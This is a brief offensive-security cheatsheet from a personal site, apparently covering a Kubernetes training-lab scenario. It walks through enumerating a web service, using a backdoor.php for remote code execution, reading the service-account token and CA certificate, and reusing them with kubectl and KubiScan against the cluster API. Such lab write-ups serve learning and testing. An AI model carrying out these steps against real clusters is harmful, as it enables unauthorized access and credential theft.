[ Home ] [ Writeups ] [ Papers ] [ Cheatsheets ] [ About ]


.:: KUBERNETES Exploitation 2 ::.

~ Cheatsheet ~
cabir - KUBERNETES 2
Title : CLUSTER KUBERNETES - SCENARIO 2 : Inguardians Environnement
Author : cabir
Date : Sept 14, 2019
-=[ Privilege escalation with malicious pod ]=-
FingerPrint dirb http://10.23.58.40:30677/ /usr/share/dirb/wordlists/big.txt dirb http://10.23.58.40:30677/ /usr/share/dirb/wordlists/big.txt -x .php Result --> backdoor.php Got an RCE with backdoor.php ls /run/secrets/kubernetes.io/serviceaccount cat /run/secrets/kubernetes.io/serviceaccount/token cat /run/secrets/kubernetes.io/serviceaccount/ca.crt cat /run/secrets/kubernetes.io/serviceaccount/namespace OU http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/token http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/ca.crt http://10.23.58.40:30677/backdoor.php?d=/run/secrets/kubernetes.io/serviceaccount/namespace On your computer download kubectl curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/ linux/amd64/kubectl Try to get pods: ./kubectl --token=`cat jwt.token` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 get pods Response: Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:mktg:wordpress" cannot list resource "pods" in API group "" in the namespace "default" Kubi-Scan : python3 KubiScan/KubiScan.py -ho 10.23.58.40:6443 -t jwt.token -c ca.crt -a https://10.23.58.40:6443/version https://10.23.58.40:10250/pods https://10.23.58.40:10250/healthz https://10.23.58.40:10250/logs
[ Home ] [ Writeups ] [ Papers ] [ Cheatsheets ] [ About ]